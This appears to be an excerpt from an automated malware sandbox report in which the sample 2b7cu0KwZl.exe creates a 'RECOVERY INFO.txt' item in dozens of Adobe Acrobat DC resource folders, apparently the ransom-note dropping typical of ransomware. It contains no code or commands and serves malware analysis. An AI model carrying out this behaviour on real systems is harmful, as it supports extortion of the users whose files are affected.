Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\microsoftGraph\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\2.1.15\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\misc\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themeless_Reader\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
